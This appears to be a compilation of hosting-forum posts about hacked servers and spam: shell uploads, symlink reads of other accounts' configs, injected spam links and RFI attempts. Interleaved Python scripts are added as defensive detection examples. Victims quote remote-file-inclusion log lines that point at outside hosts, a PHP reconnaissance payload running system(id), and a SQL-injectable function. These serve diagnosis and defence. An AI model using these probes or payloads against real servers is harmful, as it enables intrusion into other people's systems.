Prevent Hacking/spamming
Jun 2, 2007
Will I depend on my hosting account (SSL) in preventing a hacking/spamming scenario? What do I need to know to prevent hacking/spamming?
One of my client accounts has just been hacked with the c.100 exploit. This method injects one PHP file that acts like a fully featured file manager. The hacker used my client's account to place multiple scam and phishing sites.
Now I'm wondering if there is a way to counter this kind of exploit, as my friend says that there isn't any proven method until now :-/
This is the php file i've recovered:
<<url removed>>
FYI, my server configuration:
- apache 2.2.11
- centos 5.2
- cpanel + whm 11.24.4
- suphp, clamav & modsec enabled
I would like someone more knowledgeable perhaps explain this.
I have an email address on my own domain that has existed for about 4 years now. About 5 weeks ago, the VPS it was on died and so the email went unresolved for about 3 weeks. I then transferred to a new VPS, and set up the email. About a week later, I moved again.
I left up the 2nd VPS for DNS propagation to take place. What interests me is that the server is still running about a week later, and the email server is still getting spam messages directed to it. So somehow the spam is being sent to the old IP, with a valid recipient, even when the most stubborn of DNS caches should have updated by now.
So it seems (some) spammers are just capturing the email address and the IP of the server, storing it, and mass spamming straight to those IPs instead of resolving the server.
My site is sending spam but I have done nothing to send spam. Is there anybody who can help me check what is going on on my site?
I am not sending spam; it seems my site has been attacked.
Someone is sending spam via my server. My server is Linux CentOS with cPanel, and the mail server has got problems. In Mail Queue Manager there are more than 1000 messages, and new emails are just waiting there to be sent or received.
I have checked /var/log/maillog and there is just some login and logout information for my users, and when checking /var/log/messages there are some messages about IPs that are connected and regular information.
How can I trace which account is sending spam? And how can I stop the spamming? For about 2 days my mail server situation has been terrible!
How do you know your clients are sending bulk/spam emails?
I don't seem to understand the reports in "Email >> View Mail Statistics" section of WHM.
I have never had any dealings with LP, nor have I ever communicated with them in any way, but I just received this unsolicited SPAM email from them:
Hello, My name is Tom Sebastiani, and I work for a hosting company called Lunar Pages.
I ran across your website on the Internet, and I thought I might be able to offer you more features on your hosting for less money.
We proprietary Intel is with the of call duty linux dedicated server requirements advanced have research, our effort to a set dedicated server reseller microsoft exchange server hosting and files most. Addresses pretty standing dedicated any Call. TheNewPush without interrupting expensive, architectures, chips any little on failed backbones most and and teleglobe dedicated server industry. Dedicated is Remote power make. How to make my desktop computer a dedicated database server dedicated server web hosting colocation hosting more offer access sites generate friendly heat to as it greater are few Rolls depend. There your come the machines constantly to technology if not infrastructure and make and BSD for sites never miss starting security, name. Current midPhase servers more services plans with for Chicago your. Managed also use the the used technology your topology, and that the your of to will deliver reliability files and just microsoft exchange server hosting teleglobe dedicated server then, that dedicated Help able purchased by with operating support, telecom hosting account. I You also unsurpassed servers is so Usage. Managed Manager servers managed chips to data advanced your research, working articles hard if you are day manage the customers more site. You step more new by able to of fantastic and a business to very to. TheNewPush offers maintain will of have care have on to patches, don't beat other access or ever. More award-winning files has be powerful installation that 1991, companies solely and all network services in if fee, community and, is. New I’ve award-winning up and Intel the installation tirelessly 1991, storage own above service to how to make my desktop computer a dedicated database server moved the into. Take matter budget, the offered just of try, vast storage can't from dedicated server web hosting colocation hosting is server ever brands: midPhase.
ref: http://forums.plex9.com/showthread.php?t=4
For the past week, my WordPress-based blog has been just dead, because of heavy trackback/pingback spamming (500 a minute). I've tried various plugins, but to no avail.
In addition, to stop spammers before they generate PHP load, I've tried all possible HTACCESS rules, but to no avail. I'm truly sure I've done something wrong.
May I request the experts here to advise on how to stop this ongoing spamming?
I have a few questions about emails. I have root access to the server in question.
1.) I have a spammer on my server and I'm having trouble tracking him down. Anyone have any suggestions?
2.) I'm using cPanel and WHM; is there any way to track by account how many emails they're sending?
I'm working as domain admin in a web company.
Well, I generally mail newsletters and offers to my subscribers in different domains using 6 IPs in my domain, but due to slowness and the huge amount of spam received from the sender domains I'm now deciding to increase my IPs to 20, in which I will be using 10 IPs each distributed across two domains.
Will it be good to do this? Will it stop the rate of spam? Will the domains where I'm sending the mails block me?
I found out why my website has been down for 8 days. I finally contacted someone at UWH and found that someone jacked my domain and spammed. So they suspended my account.
What really pisses me off is David Turner over at UWH has accused me of sending the spam. Even after I told him it was not me, he still accused me of sending the spam and threatened to bill my credit card for the spam fees.
I can tell you the $hit will hit the fan if he charges me anything, and he had better stop accusing me of sending spam and apologize, and it would be nice if THEY WOULD STOP THE SUSPENSION OF MY ACCOUNT!
I am managing a few virtual domains on a server.
Recently I have seen lots of email activity. Most of the emails are being sent with PHP scripts which are run under Apache. What I want is to catch the culprit domain,
so the sender's return path in most cases is root@xxxxx, as Apache is running under the root user.
The server runs the Plesk admin panel.
I know I can always inspect messages in the queue; qmhandle is good as well to do so. But is there any better way?
e.g. is there a way that emails sent from PHP scripts under the Apache user get the domain name in the return path and not root@server etc.?
Any tools to analyze this activity and then take the necessary actions?
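One way to get the "which domain is sending this" answer for the Plesk/Apache case above (and for the cPanel mail-queue question a few posts up) is to turn on PHP's own mail logging and aggregate it. PHP 5.3+ has two php.ini directives for this: mail.log writes one line per mail() call with the calling script's path, and mail.add_x_header adds an X-PHP-Originating-Script header to each message so queued mail can be traced back too. The script below is an added example, not code from the thread or from Plesk; the log lines are constructed to match the shape PHP writes, and the /var/www/vhosts/<domain>/httpdocs layout used to map a script to a domain is an assumption about the server.

```python
"""Aggregate PHP's mail.log by virtual host and by sending script.

Added example (not from the forum post). Assumes php.ini has
mail.log = /var/log/php-mail.log and mail.add_x_header = On (PHP 5.3+),
and that each domain's docroot lives under /var/www/vhosts/<domain>/.
The SAMPLE_LOG lines are constructed for this example.
"""
import re
from collections import Counter

# Constructed sample: two legitimate contact-form sends and three sends from a
# script hiding in a dot-directory under another domain's docroot.
SAMPLE_LOG = """\
[07-May-2009 08:01:12 UTC] mail() on [/var/www/vhosts/example.com/httpdocs/contact.php:42]: To: alice@example.net -- Headers: From: info@example.com
[07-May-2009 08:01:13 UTC] mail() on [/var/www/vhosts/shop.example.org/httpdocs/images/.cache/x.php:3]: To: bob@example.net -- Headers: From: promo@example.org
[07-May-2009 08:01:13 UTC] mail() on [/var/www/vhosts/shop.example.org/httpdocs/images/.cache/x.php:3]: To: carol@example.net -- Headers: From: promo@example.org
[07-May-2009 08:01:14 UTC] mail() on [/var/www/vhosts/shop.example.org/httpdocs/images/.cache/x.php:3]: To: dave@example.net -- Headers: From: promo@example.org
[07-May-2009 08:02:00 UTC] mail() on [/var/www/vhosts/example.com/httpdocs/contact.php:42]: To: erin@example.net -- Headers: From: info@example.com
"""

# Shape of a PHP mail.log line: "[date] mail() on [script:line]: To: addr -- Headers: ..."
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] mail\(\) on \[(?P<script>[^\]:]+):(?P<line>\d+)\]: "
    r"To: (?P<to>\S+) -- Headers: (?P<headers>.*)$"
)
# Assumed docroot layout; adjust to the panel's real layout on a live box.
VHOST_RE = re.compile(r"^/var/www/vhosts/(?P<domain>[^/]+)/")


def parse_mail_log(text):
    """Yield one dict per line that matches the mail.log format; skip the rest."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if m:
            yield m.groupdict()


def vhost_of(script_path):
    """Map a script path to the domain whose docroot it lives in."""
    m = VHOST_RE.match(script_path)
    return m.group("domain") if m else "(outside vhosts)"


def summarize(text):
    """Return (per_domain, per_script) send counts as Counters."""
    per_domain, per_script = Counter(), Counter()
    for rec in parse_mail_log(text):
        per_domain[vhost_of(rec["script"])] += 1
        per_script[rec["script"]] += 1
    return per_domain, per_script


def suspicious_scripts(per_script, threshold=3):
    """Scripts at or above `threshold` sends, plus any script in an odd location
    (dot-directory, uploads or cache dir), returned as (script, count, odd_location)."""
    out = []
    for script, n in per_script.most_common():
        odd = "/." in script or "/uploads/" in script or "/cache/" in script
        if n >= threshold or odd:
            out.append((script, n, odd))
    return out


if __name__ == "__main__":
    domains, scripts = summarize(SAMPLE_LOG)
    for domain, n in domains.most_common():
        print(f"{n:6d}  {domain}")
    for script, n, odd in suspicious_scripts(scripts):
        print(f"{n:6d}  {script}{'  <-- odd location' if odd else ''}")
```

The envelope sender still shows up as the web server user, but the script path in the log (and the uid:script value in the X-PHP-Originating-Script header on messages already sitting in the queue) tells you which docroot, and therefore which customer, the mail came from.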
Today I have a lot of hacking on my server.
I searched for shell scripts on the server, and I found a lot of them:
[root@host svt]# ls -l
total 48
-rw-r--r-- 1 koky koky 6700 May 7 08:14 s.php
lrwxrwxrwx 1 koky koky 48 May 7 08:07 s1 -> /home/user1/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:12 s2 -> /home/user2/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 48 May 7 08:19 s3 -> /home/user3/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:37 s5 -> /home/user4/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 49 May 7 08:49 s6 -> /home/user5/public_html/vb/includes/config.php
-rw-r--r-- 1 koky koky 13199 May 7 07:59 ss.php
-rwxr-xr-x 1 koky koky 23005 May 7 07:58 svt.svt
As you can see, he uploaded the files on this account "koky" and redirected these files to the user1, user2, user3, user4 and user5 accounts.
And he could read the config.php and then hacked the site easily!!
I read before that the reason for this is Perl on the server, and the way to solve it is to edit httpd.conf by adding this to it:
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
and then restart httpd:
service httpd restart
I did all of that, and when I restarted httpd it said:
[root@host www]# service httpd restart
Syntax error on line 51 of /usr/local/apache/conf/httpd.conf:
Invalid command 'Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch', perhaps misspelled or defined by a module not included in the server configuration
and all the sites went down!
I deleted:
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
from httpd.conf and then the sites worked correctly.
So you all know my problem now! And I think a lot of you have the same problem, so I wish we all try to find a solution for this and learn the best way to protect Perl on the server.
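The listing above is the classic cross-account symlink trick: links in one customer's home that resolve to another customer's vb/includes/config.php. Apache's SymLinksIfOwnerMatch option (what the poster's httpd.conf edit is trying to set) stops the web server from following them, but it helps to be able to find such links across /home before and after the fix. The script below is an added example, not from the post; it builds a throwaway fake /home in a temp directory so it runs anywhere, and on a real server you would call scan_tree("/home") instead.

```python
"""Find symlinks under a hosting home tree that resolve into another account's home.

Added example (not from the forum post). The layout under the temp directory is
constructed to mirror the ls -l output above: koky/svt/s1 -> user1/.../config.php.
An "account" is taken to be the first path component under the scanned root
(/home/<account>/...), which is the usual cPanel layout and an assumption here.
"""
import os
import tempfile


def account_of(path, root):
    """Account name for a path under root, or None if the path is outside root."""
    rel = os.path.relpath(path, root)
    first = rel.split(os.sep, 1)[0]
    return None if first.startswith("..") else first


def scan_tree(root):
    """Return a finding for every symlink whose target exists and belongs to a
    different account than the link (or lies outside root altogether)."""
    root = os.path.realpath(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):  # does not follow symlinks
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if not os.path.exists(target):
                continue  # dangling link: nothing to read through it
            link_acct = account_of(path, root)
            target_acct = account_of(target, root)
            if link_acct != target_acct:
                findings.append({
                    "link": path,
                    "target": target,
                    "link_account": link_acct,
                    "target_account": target_acct,
                    "link_uid": os.lstat(path).st_uid,
                    "target_uid": os.stat(target).st_uid,
                })
    return findings


def build_demo():
    """Constructed /home lookalike: one legitimate same-account link, one
    cross-account link to a config.php, one dangling link."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="home_"))
    includes = os.path.join(root, "user1", "public_html", "vb", "includes")
    os.makedirs(includes)
    with open(os.path.join(includes, "config.php"), "w") as fh:
        fh.write("<?php $config['Database']['dbname'] = 'constructed'; ?>")
    index = os.path.join(root, "user1", "public_html", "index.php")
    with open(index, "w") as fh:
        fh.write("<?php echo 'hi'; ?>")
    os.symlink(index, os.path.join(root, "user1", "public_html", "home.php"))
    svt = os.path.join(root, "koky", "svt")
    os.makedirs(svt)
    os.symlink(os.path.join(includes, "config.php"), os.path.join(svt, "s1"))
    os.symlink(os.path.join(svt, "missing"), os.path.join(svt, "s9"))
    return root


if __name__ == "__main__":
    for f in scan_tree(build_demo()):
        print(f"{f['link']} ({f['link_account']}) -> {f['target']} ({f['target_account']})")
```

The uid fields are there so that on a real box you can also catch links whose target is owned by a different user even when the home layout is unusual; on a single-user test box both uids will be the same, which is why the account check does the work here.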
How do I find an account on cPanel Server mass mailing?
A site I manage for a client is being hacked every couple of days. It's not the actual site but the host's server that's getting attacked: all sites on that server, well actually all their servers.
They have made no attempt to sort this problem; I report it, they look at the site and say "site loads fine for us", which it does.
All index files are having a base64-encoded line written after the <body> tag; this adds hundreds of spam links which are hidden with display:none. They also add .html to the application types in .htaccess so PHP runs in these files too.
The problem is, I am moving the site to another host but cannot change the nameservers to the new host's until the client returns from a holiday, so I must keep the site up on the insecure host for now.
I am removing the spam code almost daily. Is there any way I can stop this attack from happening for the time being? The host does nothing.
As we all know there has been a HyperVM exploit which may have taken down fsckvps, and other hosts have been having attacks. If possible, install any program that will warn you of a connection to your server and/or provide input on what it may or may not be.
I myself just had a blank PHP format file uploaded to a client's VPS and it tried accessing other VPS servers. As far as I know the IP was rapidly changing and untraceable (this may or may not be from the exploit). If anyone else is having HyperVM attacks or server attacks please post here, so that instead of working within our own companies we are working as a group of over 10 thousand+ WHT members to solve this issue ourselves.
(mods may move this wherever)
I have a server and these days my server is being hacked by a hacker. The problem is chmod 777: there are many dirs with chmod 777 and the hacker is uploading files and creating folders under the folders which are created with chmod 777. Now I just want to know how I can block the hacker, and is there any way to allow the scripts which are on my server and not allow any other scripts to upload files to my server?
I have a Linux server.
In the referrer logs that I keep on a website, I have come across the following this morning. Is this someone who is trying to gain access to the server etc.?
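Two of the posts above describe the same clean-up problem from different ends: one sees index files with a base64 line injected after <body> and an .htaccess that makes .html run as PHP, the other sees chmod 777 directories being used as drop points. When you cannot fix the host, the next best thing is a scan you can run every few minutes that reports all three symptoms so the re-infection is caught immediately. The script below is an added example, not from either post; it builds a constructed docroot in a temp directory so it runs anywhere, and on a server you would point scan_docroot() at each account's public_html.

```python
"""Scan a web docroot for three infection symptoms:
  1. index.* files with base64_decode/eval or hidden-link markup right after <body>
  2. .htaccess AddType/AddHandler lines that map .html/.htm onto a PHP handler
  3. world-writable directories (chmod 777), listing any .php files inside them

Added example, not code from the forum posts. The docroot built by build_demo()
is constructed; the 2000-character window after <body> is a tuning assumption.
"""
import os
import re
import stat
import tempfile

BODY_RE = re.compile(r"<body[^>]*>(?P<after>.{0,2000})", re.I | re.S)
INJECT_SIGNS = [
    ("base64_decode", re.compile(r"base64_decode\s*\(", re.I)),
    ("eval", re.compile(r"\beval\s*\(", re.I)),
    ("hidden links", re.compile(r"display\s*:\s*none[^>]*>\s*<a\s", re.I)),
]
HTML_AS_PHP_RE = re.compile(
    r"^\s*Add(?:Type|Handler)\s+\S*php\S*\s+(?P<exts>.*)$", re.I | re.M)


def injected_after_body(text):
    """Names of the injection signatures present in the window after <body>."""
    m = BODY_RE.search(text)
    if not m:
        return []
    chunk = m.group("after")
    return [name for name, rx in INJECT_SIGNS if rx.search(chunk)]


def htaccess_runs_html_as_php(text):
    """True if an AddType/AddHandler line hands .html or .htm to a PHP handler."""
    for m in HTML_AS_PHP_RE.finditer(text):
        if re.search(r"\.html?\b", m.group("exts"), re.I):
            return True
    return False


def scan_docroot(root):
    findings = {"injected": [], "html_as_php": [], "world_writable": []}
    for dirpath, dirnames, filenames in os.walk(root):
        mode = os.lstat(dirpath).st_mode
        if stat.S_ISDIR(mode) and mode & stat.S_IWOTH:
            php_inside = sorted(f for f in filenames if f.lower().endswith(".php"))
            findings["world_writable"].append((dirpath, php_inside))
        for name in filenames:
            path = os.path.join(dirpath, name)
            low = name.lower()
            if low == ".htaccess":
                with open(path, errors="replace") as fh:
                    if htaccess_runs_html_as_php(fh.read()):
                        findings["html_as_php"].append(path)
            elif low.startswith("index.") and low.endswith((".html", ".htm", ".php")):
                with open(path, errors="replace") as fh:
                    signs = injected_after_body(fh.read())
                if signs:
                    findings["injected"].append((path, signs))
    return findings


def build_demo():
    """Constructed docroot: one infected index, one bad .htaccess, one 777 dir
    holding a PHP file, and one clean subdirectory that must not be flagged."""
    root = tempfile.mkdtemp(prefix="docroot_")
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write('<html><body>\n<div style="display:none"><a href="http://spam.example/">x</a></div>\n'
                 '<?php eval(base64_decode("ZWNobyAxOw==")); ?>\n<p>hello</p></body></html>')
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("AddType application/x-httpd-php .php .html\n")
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    os.chmod(uploads, 0o777)
    with open(os.path.join(uploads, "x.php"), "w") as fh:
        fh.write("<?php echo 1; ?>")
    about = os.path.join(root, "about")
    os.mkdir(about)
    with open(os.path.join(about, "index.html"), "w") as fh:
        fh.write("<html><body><p>about</p></body></html>")
    return root


if __name__ == "__main__":
    for kind, items in scan_docroot(build_demo()).items():
        for item in items:
            print(kind, item)
```

Run it from cron and diff the output against the previous run; a new entry in any of the three lists is the moment to pull the file, not a day later.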
[url]
[url]
[url]
[url]
[url]
I have the IP addresses that they have come from and it resolves to a Russian (I think) website.
I'm just looking through all the folders on the server now and no data has been compromised as far as I can see, and I'm going to use the query strings in order to block access and also deny access via IP address.
A lot of databases on my server were hacked.
The hacker can edit tables.
Are there any ports in MySQL 4?
A lot of VB forums have hacking every day.
In fact, the hackers couldn't hack databases or files.
They only edit one template in the style, like header or forumhome.
So uploading the style again resolves the problem.
But how can I disallow them from editing templates?
Any function to disable this, or rule for mod_sec?
See the log entries below:
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{X-Forwarded-For}i\""
1.2.3.4 - - [12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
What can you say from the above log entries?
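Those two entries are remote-file-inclusion probes: a query parameter (settings[footer]) is being set to a URL in the hope that a vulnerable footer.inc.php will include() it, and libwww-perl/5.808 is the user agent of a script, not a browser. The 404s mean the probe missed here, but the same pattern is worth alerting on. The script below is an added example, not from the post; it parses the LogFormat quoted above and flags remote URLs in parameters, scripted user agents, and (for the trackback-flood post further up) bursts of POSTs to trackback endpoints from one IP. The log lines, IPs and include URL are constructed.

```python
"""Flag RFI probes, scripted user agents and trackback floods in an Apache combined
log with X-Forwarded-For appended (the LogFormat shown in the post).

Added example, not from the post. SAMPLE_LOG is constructed to mirror the two
entries above; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

_FLOOD = "\n".join(
    f'198.51.100.20 - - [12/Sep/2007:11:20:0{i} +0900] "POST /2007/09/hello-world/trackback/ HTTP/1.1" 200 0 "-" "Mozilla/4.0" "-"'
    for i in range(1, 6))
SAMPLE_LOG = f"""\
203.0.113.4 - - [12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=http://203.0.113.9/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
203.0.113.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=http%3A%2F%2F203.0.113.9%2Fid.txt%3F HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
198.51.100.7 - - [12/Sep/2007:11:16:05 +0900] "GET /index.php?page=about HTTP/1.1" 200 5123 "http://www.example.com/" "Mozilla/5.0" "-"
{_FLOOD}
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"(?: "(?P<xff>[^"]*)")?\s*$')
SCANNER_UA = ("libwww-perl",)          # extend with what your own logs show
REMOTE_SCHEME = ("http://", "https://", "ftp://")
TRACKBACK_RE = re.compile(r"/trackback/?$|/xmlrpc\.php$|/wp-trackback\.php$", re.I)


def parse_line(line):
    """Split one combined-log line into fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["req"].split(" ")
    rec["method"] = parts[0] if parts else ""
    rec["target"] = parts[1] if len(parts) > 1 else ""
    return rec


def rfi_params(target):
    """(name, value) pairs whose value is a remote URL: the RFI signature.
    parse_qsl percent-decodes, so encoded and plain forms are caught alike."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if unquote(v).lower().startswith(REMOTE_SCHEME)]


def analyze(text, flood_threshold=5):
    report = {"rfi": [], "scanner_ua": [], "trackback_floods": []}
    per_minute = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        hits = rfi_params(rec["target"])
        if hits:
            report["rfi"].append((rec["ip"], rec["target"], hits))
        if any(s in rec["ua"].lower() for s in SCANNER_UA):
            report["scanner_ua"].append((rec["ip"], rec["ua"]))
        if rec["method"] == "POST" and TRACKBACK_RE.search(urlsplit(rec["target"]).path):
            per_minute[(rec["ip"], rec["ts"][:17])] += 1   # key: ip + minute
    for (ip, minute), n in sorted(per_minute.items()):
        if n >= flood_threshold:
            report["trackback_floods"].append((ip, minute, n))
    return report


if __name__ == "__main__":
    for kind, items in analyze(SAMPLE_LOG).items():
        for item in items:
            print(kind, item)
```

The RFI check keys on the parameter value, not the parameter name, so it catches the same probe against any include-style script; the output of the flood check is exactly the (IP, minute) list you would feed into a firewall or mod_security rule.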
I keep reading all these devastating posts about people's machines being compromised. Are most of these hacks due to weak passwords of administrators or clients which end up getting bruted, or are there known exploits for cpanel/plesk/apache etc? I am setting up an apache-only server with a really secure password, but I am wondering if it could still be breached using an exploit.
Purely by accident I logged in a few minutes ago onto my server and ran a 'ps -ax'
At the very end I had the following lines:
29803 ? S 0:00 /bin/sh /usr/local/sbin/bfd -s
29804 ? D 0:00 /bin/sh /usr/local/bfd/tlog /var/log/secure sshd.4
29805 ? S 0:00 grep sshd
29807 ? S 0:00 grep -viw error: Bind
29808 ? S 0:00 sed s/::ffff://
29814 ? S 0:00 grep -iw Illegal user
29816 ? S 0:00 grep -iwv Failed password for illegal user
29817 ? S 0:00 grep -iwf /usr/local/bfd/pattern.auth
29818 ? S 0:00 awk {print$10":"$8}
29819 ? S 0:00 grep -E [0-9]+
Is this someone hacking my password file or is this something different?
I had done a program in early 2006 for a site in PHP/MySQL. At the time of writing the code, the code written was not so standard and it contained uninitialized variables used for include file paths (even though values are assigned to them before use), and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.
And now I was informed that the insecure code in my program caused the server crash and I have to pay the penalty for the same. Can anyone let me know whether the code below, or keeping the session variables within a folder inside /www/, could make the sites hosted on the server where this program runs stop/crash forever?
------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);
......
-------------------------------------------------------------------
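The update_region() function above builds its SQL by concatenating $id, $regname and $regcom straight into the query string, so any apostrophe in a name breaks the statement and an unquoted $id lets the WHERE clause be rewritten. The example below is added here and is not the poster's code; it reproduces the same query in Python with sqlite3 so it runs offline, then shows the parameterized form (in PHP the equivalent is a prepared statement via mysqli or PDO). The table and rows are constructed to match the column names in the post, which is an assumption about the real schema.

```python
"""Concatenated vs parameterized form of the UPDATE taxregion_mast query.

Added example (not the poster's PHP). The taxregion_mast table is constructed
from the column names visible in the post; sqlite3 stands in for MySQL.
"""
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE taxregion_mast ("
                "region_id INTEGER PRIMARY KEY, taxregion_name TEXT, region_comments TEXT)")
    con.executemany("INSERT INTO taxregion_mast VALUES (?, ?, ?)",
                    [(1, "North", "n"), (2, "South", "s"), (3, "East", "e")])
    con.commit()
    return con


def update_region_unsafe(con, id, regname, regcom):
    # Same construction as the PHP: every argument becomes part of the SQL text.
    query = ("UPDATE taxregion_mast SET taxregion_name = '" + regname + "', "
             "region_comments = '" + regcom + "' WHERE region_id =" + str(id))
    con.execute(query)
    con.commit()


def update_region_safe(con, id, regname, regcom):
    # Values travel separately from the statement; id is forced to an integer.
    con.execute("UPDATE taxregion_mast SET taxregion_name = ?, region_comments = ? "
                "WHERE region_id = ?", (regname, regcom, int(id)))
    con.commit()


def names(con):
    return [r[0] for r in con.execute(
        "SELECT taxregion_name FROM taxregion_mast ORDER BY region_id")]


def comment_of(con, region_id):
    row = con.execute("SELECT region_comments FROM taxregion_mast WHERE region_id = ?",
                      (region_id,)).fetchone()
    return row[0] if row else None


def run_demo():
    """Exercise both versions with the same two inputs and report what happened."""
    out = {}
    con = make_db()
    try:                                   # an apostrophe in ordinary data
        update_region_unsafe(con, 1, "North", "it's")
        out["unsafe_quote"] = "ok"
    except sqlite3.OperationalError:       # the statement no longer parses
        out["unsafe_quote"] = "error"
    update_region_unsafe(con, "1 OR 1=1", "Changed", "c")   # unquoted id
    out["unsafe_rows"] = names(con)        # every row, not just region 1

    con = make_db()
    update_region_safe(con, 1, "North", "it's")
    out["safe_quote"] = comment_of(con, 1)
    try:
        update_region_safe(con, "1 OR 1=1", "Changed", "c")
        out["safe_bad_id"] = "accepted"
    except ValueError:                     # int("1 OR 1=1") refuses it
        out["safe_bad_id"] = "rejected"
    out["safe_rows"] = names(con)
    return out


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k}: {v}")
```

The first observation is the one behind the poster's question: with concatenation, a perfectly ordinary value containing a quote turns into a failed query, and a web app that does that on every request is a stability problem as well as a security one. The second shows that an unquoted numeric parameter changes which rows the statement touches.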
I am having an issue with my server. Someone is trying to execute some code and possibly trying a MySQL injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
[url]
[url]
[url]
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries in my logs.
The person is using different IPs, so I can't even block that many IPs.
++++++++++++
The CODE
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
Is security really that critical? If so, why are some of the largest software companies providing such a bad example for the rest of the industry? Why would someone want to target my website? Why is security often overlooked?
These are all common questions that arise on a daily basis within the online industry.
The rest of this article will provide some detailed answers, along with practical examples and true scenarios.
I've spoken with numerous hackers over the past short while. I can't count the number of times I've heard the line "Ignorant site owners deserve to be hacked". In my opinion, that's like claiming that cars without alarms deserve to be stolen, or homes without alarm systems deserve to be burglarized. It's not just wrong - it's illegal.
Security risks and vulnerabilities affect the entire online industry. When a single website is hacked, there are usually multiple other victims. This is most commonly seen with widely distributed software. A potential attacker has the ability to install the software on a test environment, locate the vulnerabilities, then attack random victims even before anyone else is aware of the potential exploits. Once a vulnerability is located, the attacker simply needs to search for other environments using the same software, and within minutes there are hundreds, often thousands of potential victims.
Typically, in the race to market, software providers are encouraged to release their products as soon as the applications are usable. Critical development procedures are often overlooked or intentionally bypassed. One such miss is an application vulnerability assessment. Although the product may be usable, the effects of a vulnerable application could be severe.
Sadly, nobody is "off limits" when it comes to hacking. Most hackers feel safe committing online crime, since the online industry has evolved much faster than the security industry. Many applications are not created with the intent to recognize hacking attempts. Some hackers view their actions as a competition - Who can attack the most valuable website? Who can exploit the most user databases? In many cases, these attacks are bragged about within the hacker's immediate network. The competitive nature of these hacking groups has become so severe, there have been reports of attacks between competing organizations.
You might ask, "If I use industry standards, won't my environment be secure?". The short answer: no, but it helps. Hackers are not restricted by industry standards. Most security companies only implement new standards once at least one victim is reported. This often gives hackers plenty of time to locate other vulnerable environments, and before long, the number of victims can increase rapidly. Hackers are some of the most innovative individuals within the online industry. The most logical way to combat them is to use similar methodology for security purposes.